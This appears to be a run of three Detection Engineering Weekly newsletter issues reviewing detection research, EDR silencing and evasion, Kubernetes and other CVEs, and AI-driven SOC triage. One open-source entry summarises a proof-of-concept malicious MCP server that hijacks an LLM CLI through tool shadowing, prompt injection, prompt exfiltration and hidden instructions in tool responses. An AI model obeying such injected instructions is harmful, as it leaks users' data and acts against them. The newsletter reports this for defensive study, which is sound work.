Threat intelligence list of malicious Chrome extensions removed from the Chrome Web Store. This is especially helpful if you want to test detections in a lab environment on malicious extensions, or build out scanners in your environment to see if you can find net new ones.

Received — 29 January 2026 ⏭ Detection Engineering Weekly

Detection Engineering Weekly
DEW #143 - Suppressing False Positives at Scale, Silencing EDRs & Detection Fidelity via Social Network Analysis 28 January 2026 at 14:04

DEW #143 - Suppressing False Positives at Scale, Silencing EDRs & Detection Fidelity via Social Network Analysis

Detection Engineering Weekly

By: Zack Allen

28 January 2026 at 14:04

Welcome to Issue #143 of Detection Engineering Weekly!

✍️ Musings from the life of Zack:

New England got hit hard by a snowstorm, and my town alone recorded over 20 inches/50 cm of snow!
I got COVID for the third time in the last 6 years. It definitely was milder, but I can still feel the shortness of breath that I vividly remember from the earlier and more potent strains
If you have 30 mins, check out the blog about Gas Town. It’s written like someone who’s running through an Agentic fever dream, and they managed to wake up with an insane orchestration system that makes you run out of Claude credits in 3 minutes

Sponsor: Permiso Security

ITDR Playbook: Detect & Respond to Non-Human Identity Compromise
Non-human identities are everywhere, and when they’re compromised, attackers blend in as “normal” automation. This ITDR Playbook focuses on detecting and responding to NHI compromise using operational anomalies, not login patterns. Learn how to spot exposed keys, boundary violations, privilege creep, and abnormal service behavior. Plus, get response steps that will contain risk without breaking production.
Download The Playbook

💎 Detection Engineering Gem 💎

Centralized Suppression Management for Detections Using Macros & Lookups by Harrison Pomeroy

Detection rule efficacy is the practice of curating rule sets that balance precision, recall, and the cost of triage. New detection engineers typically think about rules being the only place you can apply logic to help manage this balance. A more precise query that accounts for benign behaviors, given the tactic or technique, can increase the likelihood of capturing true positives. But there are other capabilities in SIEM technologies and software engineering practices that can perform filtering and suppress alerts in more dynamic, context-aware ways that align with the threat landscape or your environment.

This post by Harrison Pomeroy details the power of Splunk’s macro and lookup table functionality to perform suppression of alerts without re-deploying rules. A suppression is a concept in which detection engineers deploy a capability to dynamically mute alerts, thereby reducing the cost of both false-positive generation and the subsequent need to tune a rule on small fields. It also makes the rule more resilient because it can account for external factors related to benign behaviors, such as known service accounts, scheduled tasks, or internal tooling.

Harrison leverages Splunk’s macro and lookup table features to achieve this.

The above Mermaid diagram shows his really clever setup. When you apply macros to each of your Splunk rules, you can start bringing in logic to evaluate whether suppressions are enabled for the rule (the T value), and then specify a lookup table to find additional alert logic to append to your original rule to suppress false positives.

The above example suppresses alerting on any user called svc_backup. The macro executes based on the T value and performs a lookup in a table relevant to the PShell Alert rule. svc_backup is in the table and uses a NOT() filter to prevent an alert if svc_backup is present. The suppressed green box ensures the alert doesn’t fire, and the Alert red box fires because the user is jsmith.

This type of suppression occurs at query time, before the alert is generated. There are other suppressions you can apply before a log hits the index, or after the alert fires. This is a great topic for my Field Manual series, so thank you, Harrison, for the inspiration!

🔬 State of the Art

EDR Silencing by Pentest Laboratories

EDR Silencing has been a super interesting area of research for security operations and threat actors alike. Typically, when a threat actor lands on a victim box and sees an EDR process running, their top priority is finding a way to evade the EDR to avoid detection. They can employ several techniques, such as:

Avoiding EDR detection rules themselves, such as abusing indirect syscalls that EDRs have not accounted for, or using living-off-the-land binaries
Obtaining privileged access and installing kernel modules that circumvent EDR hooking logic, avoiding malicious traffic generation
Uninstalling (!) the EDR

The last bullet above is the most interesting, because it’s so simple. It makes me think of the adage “don’t let perfect be the enemy of good”. EDR Silencing follows the same process because it abuses the same simple-but-effective concept. It focuses on disrupting the network connection between the EDR cloud service and the agent. This network connection hamstrings the effectiveness of the EDR, without necessarily worrying about evasion of logic.

In this post, Pentest Laboratories provides readers with a fantastic survey of the state of the art of EDR Silencing. A huge part of this research relies on obtaining Local Administrator privileges to leverage everything from Windows Filtering Platform APIs to adding blocking entries in local DNS configuration files.

The End of the “Write & Pray” Era in SIEM: Detection as Code and Purple Team Validation by Ali Sefer

This is a clever introduction to the concept of detection-as-code through the lens of Sefer, a SOC Manager. I enjoyed the framing around moving from the “Craftsmanship” era of rule writing to the “Engineering” era. Detection engineers, at their core, should be part security experts, data analysts, and software engineers. This is especially true in Sefer’s day-to-day, where they’ve dealt with analysts who read a threat intelligence report, implement a rule in the SIEM, deploy it, and don’t perform testing.

This really is a post about detection rule governance. It’s important that we implement the boring stuff for detection rules, for the sake of managing costs. If an analyst or detection engineer deploys rules without careful validation, education, version control and testing, then operations teams run a huge risk of false positives and analyst burnout. Sefer brings the reader through an example automated test pipeline, where:

Analysts write rules
Check the rule into version control with syntax validation and linting
Run Atomic Red Team tests to validate the telemetry matches the rule
Deploy the rule into the SIEM
Instill feedback mechanisms to tune the rule

Sefer ends the blog with a real world example where an analyst tuned a rule and the logic failed the validation check with Atomic Red Team. The cool thing here is that it had nothing to do with the detection rule, but with the health of the system itself. Catching log source configurations and matching them with detection logic is just as useful as rule validation itself.

Detection Fidelity & Confidence Framework: Teaching Your SIEM to Score Its Own Homework by Hatim Bakkali

But here’s what I’ve noticed after staring at years of notable event data: detections don’t fire in isolation. They have patterns. They have Friends. And those Friendships tell us something important about fidelity and confidence.

This post is a deep dive into a new framework for measuring detection fidelity and confidence. Rule efficacy is like a garden; it requires constant curation and mindfulness of how you build and maintain detection rules. Bakkali’s approach is more math-heavy and academic but built from practical experience. The concept is around measuring the co-occurrence of alerts with other alerts, similar to how social networks create edges between friends and followers for suggestions.

The equation binds to an entity, much like Risk-Based-Alerting, and Bakkali says it should complement RBA rather than replace it. Their framework calculates two scores based on confidence and fidelity.

Confidence: scores pairs of alerts based on how often they co-occur within a time window
Fidelity: aggregates those pair scores to a detection-level “noise accumulation” score. The lower, the better

They provide a ton of examples and walkthroughs, along with SIEM-agnostic pseudocode, for readers to try themselves. There’s a bake-in period to measure these over time before you can start using them, but it’s a clever approach for a few reasons.

First, it’s an elegant addition to RBA because it’s still technically a GroupBy to an entity, but it starts looking at pairs of alerts rather than aggregating. This leads to my second point: any type of expert model, such as applying arbitrary scoring mechanisms to alerts, runs the risk of poor model validation. You need to redeploy these models every time you update your scores, which results in profound changes and creates more work. That risk exists here, but it tends to preserve relationships of the pairings, making it easier to understand changes.

Introducing IDE-SHEPHERD: Your shield against threat actors lurking in your IDE by Tesnim Hamdouni

~ Note: I work at Datadog, and Tesnim is my colleague ~ I’m super excited to post this because it was Tesnim’s internship project, and she now works at Datadog and is releasing it to the world! IDE-SHEPHERD is an IDE extension that helps prevent malicious extension installation, an emerging attack vector over the last year. The cool part of this extension is that it generates telemetry from the extension manifest for reporting and threat hunting, in addition to runtime monitoring.

It has runtime and heuristic detection capabilities. At runtime, it’ll shim Node functions that attempt to spawn processes, detect and block malicious commands, and perform network monitoring. The heuristic functionality analyzes metadata related to extensions and checks for poor developer practices, metadata anomalies, and hidden commands.

From Static Template to Dynamic Forge: Bringing the DCG420 Standard to Life for the Detectioniers by DCG420

DCG420, who wrote and released the Detection Engineering Template, has just launched a platform that serves as a workbench for detection engineers. It has an AI backend to help visualize attack flows, measure coverage and write rules. The intel analyst within me got really excited reading about their Analysis of Competing Hypothesis feature, which combines their tool and LLMs to generate competing hypotheses against your detection rule candidate. This helps check for bias and identify detection engineers who may be stuck in a rabbit hole, trying to get a rule out without considering other options.

The Indirect Realism of Threat Research by Amitai Cohen

This is an excellent commentary by Amitai on information asymmetry in threat research. We tend to (rightly) dunk on large cybersecurity companies as they create, update and hype their lexicon of APT and cybercriminal names. But, the very good ones do this for a reason: they have a lens in which they see threat activity, and they group it within their unique lens because no one else has the visibility that they do.

This bias is ever-present in security operations and detection engineering, where, according to Cohen, we become convinced that what we can measure can capture what threat actors generate. By making sure we check this bias, understand that information asymmetry exists, and obsessing over what you are missing, you can feel more confident that you are addressing gaps on an ongoing basis.

☣️ Threat Landscape

Who Operates the Badbox 2.0 Botnet? by Brian Krebs

In the latest saga of the Kimwolf botnet, it looks like the botnet's operators broke into a rival Chinese-nexus family dubbed Badbox 2.0. The admins of Kimwolf, “Dort” and “Snow”, managed to post a screenshot of the crew taking over a control panel that manages and deploys Badbox. The evolution of these botnets has recently moved away from traditional DDoS-style attacks to operating and selling access to residential proxy networks.

Krebs managed to pull an email address from the “proof” screenshot and worked his way into finding an identity. Email re-use and operational security still seem to be issues for threat actors, and it shows how one screenshot can pull the attribution thread all the way to a full identity.

A Shared Arsenal: Identifying Common TTPs Across RATs by Nasreddine Bencherchali & Teoderick Contreras

This research by Splunk’s threat research team is a survey of 18 infostealer malware families mapped to MITRE ATT&CK TTPs. The emergence of these infostealer families tends to revolve around criminal groups splitting, source code getting sold and leaked, and conversations with each other on criminal forums.

The interesting finding here is how 6 out of the 18 malware strains leverage legitimate services for their command & control infrastructure. So it’s not the worst detection opportunity to alert on anomalous traffic heading to places like GitHub, social networks, Discord, or Steam.

OpenSSL 3.6 Security Release with Vulnerabilities: 10 Vulnerabilities by OpenSSL

OpenSSL had a fairly large security release with around 10 vulnerabilities disclosed. One vulnerability who had a “High” severity rating, CVE-2025-15467, caught my eye because the title started with a stack-based buffer overflow. These theoretically can lead to remote code execution, and since OpenSSL is a security technology that underpins the Internet, I thought it would be worth to call this out.

Kubernetes Remote Code Execution Via Nodes/Proxy GET Permission by Graham Helton

This is a super interesting vulnerability writeup where the (mis)configuration was known for a long time, but a new nuance in the configuration made it much worse. Basically, Helton found a valid Kubernetes configuration that allowed authenticated attackers to access an API that serves as a “catch-all” and proxies potentially dangerous requests to the internal control-plane API for Kubernetes, called the Kubelet API.

By using a WebSocket connection to nodes/proxy with the GET verb, Kubernetes proxies the request to the Kubelet API, and it doesn’t respect its internal configuration that only allows CREATE verbs for the exec command, enabling remote code execution. Helton discovered 69 Helm Charts of well-known vendors using this configuration. The best part? There is no audit logging you can use to detect this!

Here’s the relevant snippet from Helton’s blog:

This should mean consistent behavior of a POST request mapping to the RBAC CREATE verb, and GET requests mapping to the RBAC GET verb. However, when the Kubelet’s /exec endpoint is accessed via a non-HTTP communication protocol such as WebSockets (which, per the RFC, requires an HTTP GET during the initial handshake), the Kubelet makes authorization decisions based on that initial GET, not the command execution operation that follow. The result is nodes/proxy GET incorrectly permits command execution that should require nodes/proxy CREATE.

🔗 Open Source

DataDog/IDE-Shepherd-extension

IDE extension from Tesnim’s research listed above in State of the Art.

zencefilefendi/satguard

Satguard is a Starlink telemetry detection & analysis framework to detect and visualize satellite attacks. You specify Starlink debug logs, and it’ll use a combination of static rules and anomaly detection to detect spoofing and jamming attacks and measure health of a signal.

FinkTech/mcp-security

Security rules and best practices for defending MCP servers. It’s structured super well, and has markdown reports with detailed examples, compliance mappings, example vulnerable and secure code and references. Would be great to feed this into an LLM and check for vulnerabilities as people push code to an MCP server repository.

thpeng/lokis-mcp

PoC MCP server that demonstrates how a malicious MCP server can hijack your local LLM CLI to perform four separate attacks:

Tool shadowing: convince your local LLM that this is the preferred tool, and perform prompt injection to take advantage of queries and responses
Data exfiltration: hijacks a prompt and exfiltrates it over the tool for further analysis
Response injection: injects “hidden instructions” in other tool responses to manipulate behavior
Context window flooding: DDoS the context window of the prompt which can render models with smaller context windows unresponsive

aserper/rtfd

Local MCP server that exposes tools to connect to API documentation across GitHub, npm, GoDocs and several others. This is helpful to run if you want to run agents locally and you don’t want them to hallucinate while they make up strategies that doesn’t match documentation, or you want them to use the most up-to-date documentation without trying to search the Internet.

Received — 21 January 2026 ⏭ Detection Engineering Weekly

Detection Engineering Weekly
DEW #142 - Slack's Agentic Triage Architecture, Detection <3's Data and Sigma evals 21 January 2026 at 13:54

DEW #142 - Slack's Agentic Triage Architecture, Detection <3's Data and Sigma evals

Detection Engineering Weekly

By: Zack Allen

21 January 2026 at 13:54

Welcome to Issue #142 of Detection Engineering Weekly!

✍️ Musings from the life of Zack:

I’m not usually a person who does New Year’s resolutions, but I’ve committed to small changes that have already made a positive impact in my life.
- Using a notebook to take notes and to-dos at work
- Meditate on Headspace for 4 days a week
- Playing video games twice a week. For some reason, I’m back on Dota2 so I’m sure that’ll be helpful for my mental health
There’s a 50/50 chance I’ll make DistrictCon this weekend :( There’s a massive snowstorm hitting Washington, D.C., and as a former Marylander, I can tell you that part of the country cannot handle snow
I’ve been messing with local MCP server development via stdio and HTTP APIs, and I’m starting to shill Claude Code to everyone I talk to. It ripped through a malware analysis at work a week or so ago, and we were able to hunt for IOCs in under 5 minutes.

💎 Detection Engineering Gem 💎

Streamlining Security Investigations with Agents by Dominic Marks

In the age of AI SOCs, it’s still hard to understand where the concept of agentic triage fits into everyday operations. Products tend to present the problem set and solutions in a clean, understandable way. This is a good thing - having a product company frame the space in clear, concise benefits and downsides drives the decision by the security operations team about how much cost they incur in building or buying one.

Blogs like this are showing why our industry is awesome with transparency. Slack's security operations team published its work on building an in-house agent-based triage system. You see many of the same principles and concepts across products, but because there is no moat or trade secrets to protect, there’s a lot more to dig into.

What you see above is their approach to their agent-to-agent orchestration system. The top of the pyramid starts with a director who leverages high-cost models. Thinking models that tend to take their time and deliberate on prompts and results. This makes sense from a planning and analysis perspective.

The critic biases itself to the interrogation of individual analysis from telemetry and alerts. It doesn’t require as much model cost, but it should spend a reasonable amount of time challenging assumptions and analyzing the lower-cost model. It presents the amalgamation of data and investigative output back to the director. The Director is probably thinking mode models, where you spend the most money on tokens to understand whether the bottom parts of the pyramid performed their job correctly. This is the gate between a human and the system, so you want only high-quality analysis moving forward.

The phase transition diagram is super interesting because it puts the above “Director Poses Question..” investigation step into practice.

According to Marks, the Director makes decisions for each part of the phase to see whether it needs to close the investigation or continue it further. The “trace” component is where the Director engages an expert within their architecture to perform additional investigative analyses.

Honestly, it’s hard for me to provide my own analysis here, because the blog is just so complete. So, if you are a person who is skeptical of these types of setups, borrow or steal ideas from this Slack blog and try it on your own. It seems reasonable, and if the idea is that you perform 5 investigations that take 2 hours each, it reduces 3 of them from 2 hours to 10 minutes, and it catastrophically fails on 2 of them, you still saved 6 hours!

🔬 State of the Art

Data and Detect by Matthew Stevens

This post by Stevens dives a bit deeper into the concept of detection observability. In our field, we tend to focus on the research element of rules and detection opportunities, but leave much less conversation about data quality. Remember, there is no rule without telemetry, and there is a concept Stevens points out around data usefulness that I think demonstrates this point perfectly.

Not all sources are the same when it comes to individual atomic qualities for alerting, but when you map them to techniques, you notice that the composite qualities (a sum of many data sources finding an attack chain) become crucial. The graph above, generated by Stephens, shows how important Process Monitoring is for data usefulness. In fact, without Process Monitoring, you lose close to 30% of the techniques you can combine with other data types to alert on.

They also comment on how hard it is to build schemas and normalize telemetry so your teams can operate out of a common lexicon of writing rules. This highlights that a large swath of issues we should deal with it focus heavily on the software and data engineer components of our jobs as equally as the threat research components.

Sigma Detection Classification by Cotool

Continuing Cotool’s research on security AI agent benchmark performances, they setup a website for studying performances on their benchmarks and released a new one on Sigma Detection classifications. The goal of this benchmark was to assess how well foundational models were trained on attack tactics and techniques. The Cotool team fed the full Sigma corpus to 13 foundational models and stripped the MITRE ATT&CK tags to see if they correctly mapped the tags back to the original rule.

Claude’s Opus and Sonnet 4.5 performed the best overall with the highest F1-score and but also the highest cost, ~somewhat similar to what we saw in their last benchmark on the Botsv3 dataset. The team provided their analysis of these placements, their prompts and tradecraft behind the evaluation, so others can run the same benchmarks as well.

5 KQL Queries to Slash Your Containment Time in Microsoft Sentinel by Matt Swann

I have a biased view on what is and what is not a detection rule. Even to the point where I’ve reduced the concept of rules down to one definition: a rule is a search query. There is a rationale behind it: SIEMs and logging technologies require a search query to generate results. But, as I break out of my bubble, I notice that not all search queries have the same value from a detection point of view.

In this post, Swann demonstrates this concept through the lens of a Security Incident Responder. When your goal is containment rather than accuracy or a balanced cost of alerting, accuracy matters less because the goal is to use your analysis skills to find and kick out threat actors as quickly as possible. Swann provides readers with five high-value KQL queries to help responders quickly orient around a potential intrusion. The cool part here is their unique experience in this field, even noting that some queries led to the discovery and containment of an active ransomware actor.

👊 Quick Hits

Detection as Code Home-Lab Architecture by Tobias Castleberry

I love seeing home-lab setups because there are many ways to set up an environment to practice advanced concepts with open-source and free software. This blog is part of a series by Castleberry where they document their journey from an analyst to a detection engineer, and they showcase some of their expertise and how they’ve learned along the way.

Building your own AI SOC? Here’s how to succeed by Monzy Merza

Speaking of demystifying AI SOC and agentic security engineering from Marks’ Gem listed above, this blog by Merza provides an irreverent commentary on the state of building these architectures. There are some non-negotiables Merza points out, such as data normalization, the concept of a “knowledge graph”, and honing foundational models and giving them the right instructions rather than relying on them out of the box.

The Levenshtein Mile by Siddharth Avi Singh

Before the age of LLMs, there was a ton of research and implementation of some pretty clever mathematical techniques to find and detect on threats. I used to work for a threat intelligence product company that specialized in detecting phishing infrastructure, and one of the key elements of finding phishing is understanding what the victim organization owns, so you can see how threat actors try to abuse and socially engineer its customers.

In this post, Singh details the Levenshtein Distance algorithm. The basic premise here is that you can measure the similarity between two strings and generate a score. If that score exceeds some threshold of similarity, you can generate an alert to an analyst and investigate whether or not it is phishing. Domain names are the logical data source here, and you can review them from the public domain registries, DNS traffic, or the Certificate Transparency Log and try to proactively block them before they become an issue.

☣️ Threat Landscape

After the Takedown: Excavating Abuse Infrastructure with DNS Sinkholes by Max van der Horst

This post by van der Horst helps readers understand what happens after a domain is sinkholed. We typically see news stories about a large botnet or ransomware operation being taken down, and the takedown includes seizing domain names used for command-and-control communications with victims. High fives and good vibes happen and then we focus on the next big thing.

van der Horst challenges this finality and tries to argue that a sinkhole is more than just an interruption operation; it’s also a forensic artifact that helps discover more victims and additional malicious infrastructure. They downloaded several datasets, combining passive DNS and open-source intelligence feeds, to understand the rate of disruptions and how to perform temporal analysis of these takedowns to discover unreported infrastructure.

It also allows analysts to cluster activity and create new detections as new botnets or campaigns emerge, where many cases involve the reuse of code and infrastructure techniques.

How to Get Scammed (by DPRK Hackers) by OZ

This is a great article showing an individual infection chain done by a Contagious Interview threat actor. OZ accepts the bait on Discord and walks through how the DPRK-nexus threat actor tries to infect him by taking a malicious coding test. OZ brings receipts: there’s a lengthy Discord conversation where the threat actor prods OZ and eventually convinces them to apply for the job.

There’s some cool analysis with cloning the repository and using docker and pspy to inspect the malicious traffic.

What’s in the box !? by NetAskari

NetAskari, a security researcher, stumbled upon a Chinese-nexus threat actor’s “pen-test” machine and managed to download a bunch of their custom tooling for analysis. The Chinese hacker ecosystem is in a bubble, the result of both cultural and artificial barriers imposed by the PRC. These barriers create opportunities to build tooling, exploits, and software in a silo, so when you find a goldmine of tooling available for download, it’s always great to download it and see how other hackers are performing operations.

They found a litany of post-exploitation tools, some of which are custom-written and look similar to the likes of Cobalt Strike or Sliver, a bunch of custom Burp Suite extensions, and some malware families, like Godzilla, that were used in nation-state operations against the U.S.

Dutch police sell fake tickets to show how easily scams work by Danny Bradbury

I think phishing simulations at a professional organization is lame, but I actually think it works at scale against the general populace as a form of education. Apparently, the Dutch Police thought the same. They set up a fake ticket sales website and bought ads to trick victims into visiting and purchasing tickets for sold-out shows.

Tens of thousands of people visited the website, and several thousand people bought tickets, which is a wild stat if you want to steal some credit cards. Obviously, the Police did not steal credit cards; they used them as an educational opportunity to help folks understand the risks of online ticket fraud.

CVE-2025-64155 Fortinet FortiSIEM Arbitrary File Write Remote Code Execution Vulnerability by Horizon3.ai

From the blog:

CVE-2025-64155 is a remote code execution vulnerability caused by improper neutralization of user-supplied input to an unauthenticated API endpoint exposed by the FortiSIEM phMonitor service. Oof. I couldn’t tell any of you the last time I’ve seen remote code execution vulnerabilities in SIEM technology.

The specific service, pMonitor, listens on 7900. It serves as the control plane for these devices, much like the Kubernetes control plane, and supports orchestration and configuration API calls. I ran a quick scan of likely FortiSIEM devices on Censys and found over 5000 publicly facing servers.

This blog has some details on the vulnerability, and, as with most FortiGuard and edge device vulnerabilities, user-supplied web request data with complex string parsing leads to a command injection deep within the application code.

🔗 Open Source

MHaggis/Security-Detections-MCP

Locally run MCP server for detection engineering. Leverages stdio transport so nothing leaves your machine which is always good if you are writing rules or queries in a sensitive information. It exposes 28 tools where a local LLM client (Claude, Cursor) can look at detection coverage, MITRE classification, KQL queries and data source classification.

SeanHeelan/anamnesis-release

PoC of an LLM exploit generation harness. The README has an extensive background on how they approached benchmarking Claude Opus and GPT 5.2 with no instruction on how fast they can analyze a vulnerability and generate exploit code. They introduced several constraints in test environments to challenge the models, such as removing certain syscalls, adding additional memory and operating system protections, and forcing the agents to generate an exploit with a callback.

tracebit-com/awesome-deception

Yet another awesome-* list on deception technology research, open-source repositories and conference talks.

mr-r3b00t/rmm_from_shotgunners_rmm_lol/main/mega_rmm_query.kql

This repository caught my eye because I’ve never seen a rule that started with the word “mega”. And when I mean mega, I’m thinking a few hundred lines for something pretty complicated. But this RMM detection query rule is 3000 lines long. Can you imagine needing to tune this?

ineesdv/Tangled

This is a clever phishing simulation platform that abuses iCalendar rendering to deliver legitimate-looking phishing invites. It leverages research from RenderBender, which abuses Outlook’s insecure parsing of the Organizer field.

Received — 14 January 2026 ⏭ Detection Engineering Weekly

Detection Engineering Weekly
DEW #141 - K8s Detection Engineering, macOS EDR evasion, Cloud-native detection handbook 14 January 2026 at 14:03

DEW #141 - K8s Detection Engineering, macOS EDR evasion, Cloud-native detection handbook

Detection Engineering Weekly

By: Zack Allen

14 January 2026 at 14:03

Welcome to Issue #141 of Detection Engineering Weekly!

✍️ Musings from the life of Zack:

It was a long but restful month away from you all! I can’t wait to get back into writing every week for y’all
🤝 I am accepting new sponsors for 2026! If you are interested in sponsoring the newsletter, shoot me an email at techy@detectionengineering.net. We are already almost halfway booked for Primary slots and now have Secondary slots so you have options!
I’ve started writing again for the Field Manual and I really love encapsulating my experience and knowledge into these posts. If you have ideas for Field Manual posts, comment below. I have my latest post below as the last story under State of the Art

This Week’s Primary Sponsor: Push Security

Want to learn how to respond to modern attacks that don’t touch the endpoint?
Modern attacks have evolved—most breaches today don’t start with malware or vulnerability exploitation. Instead, attackers are targeting business applications directly over the internet.
This means that the way security teams need to detect and respond has changed too.
Register for the latest webinar from Push Security on February 11 for an interactive, “choose-your-own-adventure” experience walking through modern IR scenarios, where your inputs will determine the course of our investigations.
Register Now

💎 Detection Engineering Gem 💎

A Brief Deep-Dive into Attacking and Defending Kubernetes by Alexis Obeng

For detection engineers, incident responders, and threat hunters who operate in a cloud-first environment, you probably heard developers in your organization talk about Kubernetes (k8s for short). It’s an extremely popular container orchestration framework that has been used as the de facto standard for controlling scaling, application isolation, and cost. Whether you have it in your environment or you’ve never worked with it, it’s important to note how important the security controls and detection opportunities work inside these environments, because it’s like an operating system of its own.

When Obeng first shared this research on a Slack server I was on, I was excited to read it because it’s truly a deep dive into Kubernetes security, as the title suggests. She started the blog by describing how unfamiliar this space was, and by the end, you could tell Obeng had become very familiar with detection and hunting scenarios in Kubernetes.

The blog starts with an introduction to k8s and breaks down the jargon, architecture, and nuances of how a Kubernetes environment operates. The most important thing I try to get folks to understand with k8s is that it’s separated into two detection planes. The control plane, as Obeng explains, “is the core of Kubernetes.” It helps control everything from scaling plans, what containers to run, permissions, and health checks.

The other plane, the data plane, is everything else. The hyperscalers describe this as the service’s core functionality. Since k8s’ functionality revolves around running containers, you could argue that it’s about each individual container and the isolation of those containers within k8s.

As you can see from the threat matrix, attacks along MITRE ATT&CK operate in both planes.

After giving this introduction, she jumps into several attack scenarios. But the start of this scenario section first describes her description of the k8s attack surface. This is my favorite part of the blog. Obeng outlines four major scenarios you’ll see in any k8s attack: pod weaknesses, identity and access mechanisms, cluster configuration, and control plane entry points. Notice these are focused on the control plane as the end goal. So, if you can compromise any part of the data plane, for the most part, the main goal is to attack the control plane afterward.

She ends the blog with close to 10 attack scenarios, detection rules using Falco, and a follow-up with her lab for folks who want more hands-on learning.

🔬 State of the Art

EDR Evasion with Lesser-Known Languages & macOS APIs by Olivia Gallucci

~ Note, Olivia is my colleague at Datadog ~

EDR blogs from independent researchers are hard to find. It’s not that the blogs are tucked away in dark corners of the Internet, instead, EDR researchers who don’t work at vendors are few and far between. So, anytime I get to see research that goes deep into the EDR space, I pay close attention.

This is especially true for the macOS world. Microsoft has years of security solutions and a litany of researchers who document all kinds of peculiar malware and EDR behavior. This is logical, since most major security incidents over the last 30 years have been on Windows platforms. But in the last few years, attackers have shifted their focus to macOS. The opaqueness-by-design of EDR vendors AND Apple makes it hard to learn about security internals on this platform.

This technical analysis by Olivia helps break down those barriers by first describing the ecosystem of opaqueness of macOS combined with security vendor technologies. From my understanding (and with lots of stupid questions from me to Olivia), rely on the extended security (ES) system, which is somewhat equivalent to Linux’s eBPF observability and security framework. Security vendors subscribe to security events, build detections over them, and implement EDR security response features, such as blocking a piece of malware from executing.

This has its limitations, and Olivia’s analysis under her “Technical Analysis” section points them out. It’s reminiscent of the early days of Microsoft security, when bypasses emerged from malware families, and it took a lot of effort for vendors and Microsoft to respond to them. The closed ecosystem has it’s advantages from a security controls perspective, but IMHO, it starts to do a disservice to organizations when attackers move faster than the controls you try to implement.

The Cloud-Native Detection Engineering Handbook by Ved K

This post is an excellent follow-up to Abeng’s blog, which is under the Gem at the top of the newsletter!

Detection engineering is much more than building detection rules. There are elements of software engineering, data analysis, and threat research that separate a good detection engineer from a great one. I’ve talked about this across my publication, podcasts and conference talks. But, if you want a deep dive on the how to wear and implement these skillsets, Ved’s blog is a great resource to do so.

Ved defines cloud-native detections as any research, engineering and implementation of a detection rule to identify threat activity in cloud environments (AWS, Azure, GCP) and Kubernetes. He then describes his nine-phase (!) approach to writing detections, and opens each subsection with what “hat” you should be wearing.

The value of this post lies in the diligence put into each phase, especially in the use of real-world examples. They are bite-sized sections so that I wouldn’t be phased (ha!) out by the number. It serves more as a handbook for you to reference as you move through the detection lifecycle.

My favorite section is under Phase 4, titled “Enrichment and Context.” It ties nicely with my piece about context and complexity within rules, and according to Ved, it does require a Software Engineering Hat. Ved lists out five critical pieces of context to help increase the efficacy of rules:

Identity Context: who is this (human) or what is this (service-account).
Threat Intelligence: what IP addresses, domains, or general knowledge around indicators of compromise do we have to help make decisions on this activity?
Resource and asset metadata: What critical asset inventories, compliance tags or posture related information exists to help identify the riskiness of this asset being attacked?
Behavioral baselines: is this normal behavior for this type of activity? Think Administrator activity at 2am on Saturday.
Temporal context: Attacks aren’t point-in-time, they are over a period-of-time. Can you enrich this alert with other context of events before it occurred?

Ved finishes the rest of the post, writes a detection, tests it, follows it through deployment, and sees how useful the alert is. It looks like this is his first post on his Substack, so I recommend subscribing!

How to defend an exploding AI attack surface when the attackers haven’t shown up (yet) by Joshua Saxe

This is a fantastic commentary on what happens when the security community knows that a new technology is going to bring all kinds of security issues, even though the issues haven’t materialized yet. Saxe’s framing revolves around the growing attack surfaces around AI technologies. It’s hard to parse marketing-speak and LinkedIn ads and messages from startup founders and salespeople claiming that “the bad guys are already using AI at scale to attack you!!11” without much proof. Perhaps they reference a news article about some basic usage of vibecoding malware, or a phishing site that has an HTML comment of “created by Claude Code.”

Saxe has recommendations around what security functions and specific teams can do to help prepare for this, and I will steal his framing around making controls and policies “dialable”. Security should aim to be enablers rather than disablers for our engineering and technology counterparts. So, build controls in security engineering, and implement detection & response processes, but configure them in a way so you can “dial up” the strictness as we see new attacks emerge from real scenarios rather than theoretical ones.

Introducing Pathfinding.cloud by Seth Art

~ Note, Seth is my colleague at Datadog ~

Seth recently released a comprehensive library on privilege escalation scenarios and techniques abusing IAM in AWS environments. There are 65 total paths, and 27 of them are not covered by existing OSS tools to test coverage. That good news is that the website has the description of each attack and how to perform it, as well as a helpful graph visualization so you can see the traversal rather than try to create an image in your head.

📔 Field Manual

I wrote a Field Manual issue on Atomic Detection Rules over break! Please go check it out!

☣️ Threat Landscape

The Mac Malware of 2025 👾 by Patrick Wardle

This blog is a comprehensive look back at Mac Malware incidents and research throughout 2025. Maybe I am showing my age, but if you told me 10 years ago that macOS’s popularity is going to explode in cybercriminal groups, leading to large scale compromises, I would laugh at you. Wardle lists out the top malware families, some associated incidents and blogs dissecting the malware, as well as walk through analysis of the malware using an open-source toolbox.

Researcher Wipes White Supremacist Dating Sites, Leaks Data on okstupid.lol by Waqas Ahmed

lmao

🌊 Trending Vulnerabilities

MongoDB Server Security Update, December 2025

I’m a bit late on this one due to holidays and time off, but MongoDB recently disclosed a critical vulnerability dubbed “MongoBleed” under CVE-2025-14847. It allows an unauthenticated attacker to connect to a MongoDB instance and leak memory contents, which potentially contain sensitive information around data inside Mongo, authentication data and cryptographic data.

I’m impressed with the transparency and diligence in the post. MongoDB found the vulnerability internally, validated it, built a patch, notified customers and rolled out a post. A researcher at Elastic published a PoC two days later (on Christmas, no less) that I’ll link below.

Ni8mare - Unauthenticated Remote Code Execution in n8n (CVE-2026-21858) by Dor Attias

n8n is an open-source workflow framework to build Agent-to-Agent systems. They recently disclosed two vulnerabilities, CVE-2026-21858 and CVE-2026-21877, a 9.9 and 10.0, respectively. n8n itself has skyrocketed in popularity primarily due to it’s ease of use for interfacing with Agentic workflows and platforms. The .1 difference is 21858’s arbitrary file read, which could allow reading secrets from a target system, and full remote code execution on 21877.

I really enjoyed the technical detail of this post by Attias, focused on the arbirary file read vulnerability. When you think of arbitrary file reads in a modern application stack like n8n, you can pull a lot more credentials that give you access besides dumping password files. Attias created a clever scenario on reading in arbitrary sessions and loading it into n8n’s knowledge base, allowing the extraction of the key from the chat interface itself.

🔗 Open Source

heilancoos/k8s-custom-detections

Kubernetes lab environment and corresponding detection rules from Obeng’s gem above.

appsecco/vulnerable-mcp-servers-lab

Hands-on lab for testing security vulnerability knowledge against MCP servers. There are nine scenarios, and each one looks pretty reasonable in their real-world applicability. You’ll need Claude and python to run each one, and luckily with MCP, you can specify the singular Python file within the Claude config and get everything you need to get started.

Adversis/tailsnitch

Tailsnitch is a posture management tool for Tailscale configurations. You give it a Tailscale API key and it’ll connect to your tenant’s API and compare it’s configuration to secure baselines.

joe-desimone/mongobleed

Original PoC of CVE-2025-14847, a.k.a MongoBleed, dropped right on Christmas :|. Has a docker-compose file so you can safely test it yourself.

